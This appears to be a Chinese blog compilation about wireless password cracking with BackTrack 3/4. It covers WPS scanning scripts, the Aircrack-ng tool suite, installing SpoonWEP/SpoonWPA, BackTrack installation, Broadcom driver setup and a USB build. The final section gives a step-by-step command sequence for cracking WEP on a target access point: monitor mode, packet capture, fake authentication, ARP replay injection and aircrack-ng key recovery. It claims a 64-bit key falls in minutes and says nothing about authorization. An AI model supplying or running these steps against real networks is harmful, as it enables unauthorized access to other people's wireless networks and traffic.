anywlan的longas发表了"WPS, 破解无线WPA/WPA2密匙的捷径"成为了焦点, 文章已经被共享到百度文库上, 点击打开

"WPS, 破解无线WPA/WPA2密匙的捷径"中没有指出破解的环境要求, 按道理基于Linux的系统都可以支持文中的wpscan.py与wpspy.py这两个小工具. EI在Ubuntu的Live CD版中运行这两个小工具失败, 在Backtrack 3或者Backtrack 4中按照文章的过程运行会出现这样的提示:

Traceback (most recent call last):
File "./wpscan.py", line 323, in
main()
File "./wpscan.py", line 314, in main
wps = WPSQuery(iface,pfile)
File "./wpscan.py", line 44, in __init__
conf.iface = iface
NameError: global name 'conf' is not defined

在Google中搜索到"对于wps破解小工具wpscan.py与wpspy.py的小修改"一文, 将两个小工具的代码里面的"from scapy import *", 改为"from scapy.all import *"后可以在Backtrack中运行了.

这个方法其实不能真正算是一个破解手段, 类似守株待兔的破解方式. 主要利用WPS(Wi-Fi Protected Setup), 也就是一键加密来获取密码, wpscan.py的作用就是扫描附近启用了WPS的路由器, wpspy.py则监控目标路由器的WPS状态, 当目标路由器等待配对的时候连入目标无线, 然后想办法获得明文密码. 但是如果路由器上的WPS一直没有显示"push bottom", 这种方法也就没有任何意义.

下载这两个小工具

官方指出Aircrack-ng其实是一系列的无线网络审查工具, 但是许多人都只把它当成是用于破解无线网络密码的工具.

进入Aircrack-ng官方网站

Aircrack-ng的一系列工具包含了许多附属的程序, 通过这些程序来达到嗅探, 监听, 注入, 捕获, 欺骗, 攻击, 破解等操作.

airbase-ng -- 多功能的工具, 旨在攻击用户端, 而不是用于攻击访问点(AP).
aircrack-ng -- 802.11 WEP和WPA/WPA2-PSK密码破解程序.
airdecap-ng --破译WEP/WPA/WPA2捕获的文件包.
airdecloak-ng -- 从捕获的文件包中删除WEP掩护.
airdriver-ng -- 提供信息和允许安装无线驱动程序的一个脚本.
airdrop-ng -- 基于无线规则的deauthication工具.
aireplay-ng -- 无线注入和回应.
airgraph-ng -- 图形显示无线网络.
airmon-ng -- 启用和禁用无线接口监控模式.
airodump-ng -- 捕获原始的802.11帧.
airolib-ng -- 在数据库预先计算WPA/WPA2密码组用于aircrack-ng破解.
airserv-ng -- 无线网卡的TCP/IP服务, 允许多个程序同时使用无线网卡.
airtun-ng -- 创造虚拟接口通道.
easside-ng -- 一个神奇的自动化工具可以让你无需密码与经过WEP加密的无线AP通讯.
packetforge-ng -- 创建不同类型的数据包用于无线加密的注入.
tkiptun-ng -- 证明概念性的WPA/TKIP攻击的工具: 通过Qos注入几个帧到WPA TKIP网络
wesside-ng -- 一个神奇的自动化工具, 集成多种技术令其可以获取WEP密码在几分钟之内.

还包括WZCook和ivstools工具.

Aircrack-ng官方提供了Linux和Windows系统下可用程序包和源文件, Windows下的无线网卡需要安装一些必须的驱动程序才可以实现监听和注入功能. 以Linux为核心的Backtrack 3和Backtrack 4正是因为集成了这些工具而受到广告无线爱好者的追捧, 其实我们也可以在其他基于Linux核心的系统上与性Aircrack-ng工具, 例如Ubuntu和CentOS等.

SpoonWPA和SpoonWEP是同一个概念的工具, SpoonWPA用于破解无线网络的WPA密码, SpoonWPA有着与SpoonWEP几乎一样的界面, SpoonWPA同样不需要输入任何脚本或者命令, 完全通过鼠标点击来完成破解.

BackTrack 3.0 最终版下载

BackTrack 4 最终正式版下载

Backtrack 3和Backtrack 4没有内置这两款工具, 虽然Backtrack内置破解无线网络密码的命令, 但这些命令毕竟太复杂, 难免会输错导致破解失败或者过程缓慢. 我们需要自己安装这两款无线网络破解密码的利器.

Backtrack 3可以将下载的LZM文件放到"BT3\modules"目录下面, Backtrack 3启动后会自动加载这两个工具.

下载spoonwep2.lzm

下载SWPA.lzm

解码密码: ei2u

如果Backtrack 3没有在启动时加载这两个LZM, 我们可以将两个LZM文件复制到Backtrack 3的"ROOT"文件夹下, 然后用命令加载.

加载SpoonWEP2的命令: lzm2dir spoonwep2.lzm /
加载SpoonWPA的命令: lzm2dir spoonwpa.lzm /

加载完成后可以通过命令

运行spoonWEP2: spoonwep

运行spoonWPA: spoonwpa

EI测试用U盘版的Backtrack 4运行上面的命令没有成功, 也无法直接引导LZM文件, Backtrack 4可以用deb文件来安装.

下载spoonwep2.deb (只包含spoonwep2)

下载spoonwep-wpa-rc3.deb (包含spoonwep和spoonwpa)

解压密码: ei2u

下载spoonwep2.tar.gz (spoonwep2单独的gz压缩包)

将Backtrack 4启动后复制下载的deb文件到桌面, 也就是"ROOT"文件夹上. 使用命令

sudo dpkg -i 文件名.deb

其中的"文件名.deb"是可以自定义的, 也就是可以将下载下来的文件自己重命名为简短的文件名, 方便输入. 例如spoonwep2.deb可以改为1.deb而不影响安装.

安装后运行命令同样为

运行spoonWEP2: spoonwep

运行spoonWPA: spoonwpa

本文由EI翻译自backtrack-linux官方文档.
点击前往原英文版链接.

步骤:

1. 重新启动电脑, 引导进入Backtrack安装(在BIOS中选择从光盘启动或者其他方式), 引导完成后, 输入命令"startx"进入KDE图形界面.

2.双击桌面的"install.sh"脚本, 或者在控制台上运行"ubiquity".

3.选择你的地理位置后点击"向前", 键盘布局也一样.

4.屏幕显示的下一步可以让你配置分区布局. 假设我们已经重新配置了磁盘分区并且安装Backtrack到Windows 7后面的新空间上.

5.安装简介选择同意后点击"install". 让电脑自动运行安装程序直到完成. 完成时重启电脑.

6.Grub应该已经可以让你选择引导至Backtrack或者引导Windows启动.

7.用默认的用户名和密码(root/toor)登录Backtrack, 然后修改用户名和密码.

8.用"fix-splash"修复开机图片的分辨率, 如果你希望得到800×600的分辨率, 用命令"fix-splash800", 之后重启电脑.

这次Backtrack 4最终版更新包括了两个版本, 一个是硬盘版安装镜像, 另外一个是VM虚拟机的镜像, 看来官方并没有放弃使用VM虚拟机的用户, 连接包括了直接下载和使用BT下载, 也许让许多人失望的就是并没有发布Backtrack 4的USB的版本.

官方更换了新域名backtrack-linux.org作为Backtrack的主战, 旧域名的下载连接已经全部失效, EI也更新了所有的下载连接.

Backtrack 4正式版下载地址:

描述: 镜像下载
名称: bt4-final.iso
大小: 1570 MB
MD5: af139d2a085978618dc53cabc67b9269

下载地址:

直接下载

BT种子下载

描述: VM 镜像下载
名称: bt4-final-vm.zip
大小: 2000 MB
MD5: 733b47fad1d56d31bc63c16b3706a11c

下载地址:

直接下载

BT种子下载

官方最新下载原始页面:

点击打开

官方博客关于此次更新的描述:

点击打开

注意: 光盘版和U盘版不适用!

Backtrack官方上的一段关于BCM43XX芯片的说明

If 14e4:XXXX is 4301, 4307, 4311, 4312, 4318, 4319, 4320, 4321 (aka 4306 802.11b/g? only), 4324, or 4325, the card is supported with b43 driver.

All others are with 4313, 4315 (4310?), 4328 (4321 802.11n dualband), 4329 (4321 802.11n 2.4GHz), 432a (4321 802.11 5GHz), 432b (4322), 432c, 432d can only use broadcom's linux_sta driver, which is similar to using ndiswrapper.

大概意思就是如果硬件ID为"14e4:"后接"4301, 4307, 4311, 4312, 4318, 4319, 4320, 4321, 4306, 4324, 4325"的无线网卡, 可以下载b43或者b43legacy驱动来驱动无线网卡, 让其工作于Backtrack 3或者Backtrack 4下. 其他的Broadcom系列芯片的无线网卡, 只能用标准的linux驱动, 其实下面指出的, 在linux下同样适用!

要知道自己的无线网卡的设备ID, 需要在Backtrack 3 或者Backtrack 4下打开终端, 输入

lspci -vnn | grep 14e4

命令输入后Ei2U测试显示的画面大概是这样

0001:01:01.0 Network controller [0280]: Broadcom Corporation BCM4318 [AirForce One 54g] 802.11g Wireless LAN Controller [14e4:4318] (rev 02)

在"[14e4:4318]"之内的就是无线网卡的硬件ID了, 在b43的驱动页面上有相关的支持硬件列表, 点击前往

确定BCM43XX无线网卡在支持的列表之内后, 我们需要用到b43-fwcutter!
下面的代码同样适用于所有2.6.25核心以上版本的Linux. 在Backtrack下已经可以上网的, 可以直接在终端上输入

wget http://bu3sch.de/b43/fwcutter/b43-fwcutter-012.tar.bz2
tar xjf b43-fwcutter-012.tar.bz2
cd b43-fwcutter-012
make
cd ..

和Ei2U一样上不了网的, 当然就要直接把wget上的文件下载下来, 然后继续tar命令即可.

完成这一步就可以开始安装驱动了, 输入命令

export FIRMWARE_INSTALL_DIR="/lib/firmware"
wget http://mirror2.openwrt.org/sources/broadcom-wl-4.150.10.5.tar.bz2
tar xjf broadcom-wl-4.150.10.5.tar.bz2
cd broadcom-wl-4.150.10.5/driver
sudo ../../b43-fwcutter-012/b43-fwcutter -w "$FIRMWARE_INSTALL_DIR" wl_apsta_mimo.o

同样的, 能上网的直接输入, 不能上网的, 需要把wget上的文件先下载到本地. 上面命令上加载的是4.150.10.5版的驱动.

一些正在使用LP-PHY卡(例如. BCM4312), 同样的linux核心在2.6.32以上, 可以使用下面的命令加载b43-fwcutter

git clone http://git.bu3sch.de/git/b43-tools.git
cd b43-tools/fwcutter
make
cd ..

然后用命令加载驱动

export FIRMWARE_INSTALL_DIR="/lib/firmware"
wget http://downloads.openwrt.org/sources/broadcom-wl-4.178.10.4.tar.bz2
tar xjf broadcom-wl-4.178.10.4.tar.bz2
cd broadcom-wl-4.178.10.4/linux
sudo ../../fwcutter/b43-fwcutter -w "$FIRMWARE_INSTALL_DIR" wl_apsta.o

Ei2U看到官方给出的命令上的4.178.10.4实际上是4.174.64.19版驱动.

还有一些使用b43legacy 驱动的玩家, 命令如下

wget http://bu3sch.de/b43/fwcutter/b43-fwcutter-012.tar.bz2
tar xjf b43-fwcutter-012.tar.bz2
cd b43-fwcutter-012
make
cd ..

加载3.130.20.0驱动命令

export FIRMWARE_INSTALL_DIR="/lib/firmware"
wget http://downloads.openwrt.org/sources/wl_apsta-3.130.20.0.o
sudo ./b43-fwcutter-012/b43-fwcutter -w "$FIRMWARE_INSTALL_DIR" wl_apsta-3.130.20.0.o

驱动的安装就完成了, 开始Backtrack吧.

制作自己的USB版的Backtrack4系统, 并不需要任何专业的知识和操作. 一切只需要一款软件, UNetbootin.

UNetbootin允许你创建一个从Windows或Linux的Linux各种发行版本的USB驱动器启动, 而无需你刻录CD. 你可以让它下载许多不同的Linux发行版并且制作成启动U盘, Backtrack也自然在这个软件的包含之内.

UNetbootin有Windows版和Linux版, 根据自己系统的需求下载相关版本来使用.

UNetbootin支持的所有Linux版本列表, 点击打开

Windows下的版本支持Windows 2000/VISTA/7.

Windows最新版下载

Linux最新版下载

制作方法:

下载Backtrack 4到本地硬盘, 因为目前Backtrack pre4仍然属于预览版, 所以UNetbootin的下拉列表中没有Backtrack4的踪影, 下拉列表中包含的有Backtrack3最终版.

Backtrack 3最终版下载

Backtrack Pre4 下载

如图上所示, 注意"Type"哪里选择正确的U盘, 选择"Disk Image", 然后选择下载下来的Backtrack pre4的镜像文件, 之后选择"OK".
剩下的就是等待软件把Backtrack 4转换到你的U盘上了.

完成后重启电脑, 选择USB启动, Backtrack 4 U盘版就完成了.

1.Backtrack 3/4 光盘版或者虚拟机镜像, 也可以是Backtrack3 U盘版
2.一个兼容Backtrack的无线网卡
3.使用web加密的无线网络加入点(指的就是你要破解的无线网络)

点击进入Backtrack3系统下载

点击进入Backtrack4系统下载

需要的全部指令:

(红色字体的需要替换自身参数)

1) ifconfig -a
(可以查看到自己机子无线网卡的MAC地址和无线网卡的设备名称<通常为usb0或者wlan0>), 保留这个窗口方便下几步查看需要的信息, 打开新命令窗口进入一步)

2) airmon-ng start wlan0 2
(wlan0为无线网卡, 2为需要监听的频道, 根据自己情况输入, 此步骤为打开无线网卡的监听模式)

3) airodump-ng –ivs -w name -c 2 wlan0
(获取频道2的所有无线AP的信息, wlan0是无线网卡, 2为频道, 这一步的频道需要跟上一步的一致, 命令输入后会显示周围所有频道为*的无线AP,
显示的列表:
BSSID : 无线AP的Mac 地址
PWR： AP信号的大小
RXQ： 干扰值
Beacons：发送和接受的数据包, 有数据传输的时候就会跳动
#Data： 数据, 破解需要的最关键的就是这个
CH：频道
MB：网络连接速度
ESSID： AP的名称
保留这一窗口, 打开新的命令窗口进入下一步)

4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX wlan0 -1 is -one
(发送欺骗, ap_essid为AP的名称, 例如Linksys或者TP-Link, ap_mac为AP的MAC地址, 第三步的BSSID就是AP的MAC地址, XXXXXXXXX为自己无线网卡的MAC地址, 第一步可以看到. 这一步成功后会显示Successful, 如不成功需要在信号强的地方重试, 成功后才可以进入下一步)

5) aireplay-ng -3 -b ap_mac  -h XXXXXXXXXX -x 1024 wlan0
(ap_mac为无线AP的mac地址, 具体看步骤3, XXXXXXXX为无线网卡的mac地址, wlan0为网卡, 这一步执行以后, 开始正确的收发数据包, #Data开始上涨)

6) aircrack-ng -n 64 -b ap_mac name-01.ivs
(开始破解, ap_mac为ap的mac地址, 64指的是使用了64位加密, 多次破解失败的话可以试128)

多数情况下当#data开始迅速跳动的时候就可以开始破解了, 不需要等到多少包, 如果#data这个数据增长缓慢的话, 换个位置到无线信号强的地方再试, 命令输入正确的话最快3分钟搞定一个64位加密的web AP是没问题的!

可以参考的文章, 英文 http://thew0rd.com/2008/08/19/tutorial-cracking-wep-using-backtrack-3/

最新Backtrack 4 pre版下载

此次更新包括spoonwep, fastrack 和其他附加组件. 相应的补丁都已经添加.

描述: CD 镜像
名称:: bt3-final.iso
大小: 695 MB
MD5: f79cbfbcd25147df32f5f6dfa287c2d9
SHA1: 471f0e41931366517ea8bffe910fb09a815e42c7
下载: Click here

描述: USB 版(已扩展)
名称: bt3final_usb.iso
大小: 784 MB
MD5: 5d27c768e9c2fef61bbc208c78dadf22
SHA1: 3aceedea0e8e70fff2e7f7a7f3039704014e980f
下载: 原下载地址官方已经删除

描述: VMware 镜像
名称: BACKTRACK3_VMWare.rar
大小: 689 MB
MD5: 94212d3c24cf439644f158d90094ed6a
SHA1: 21c9a3f9658133efff259adbe290723583b4fd82
下载: 原下载地址官方已经删除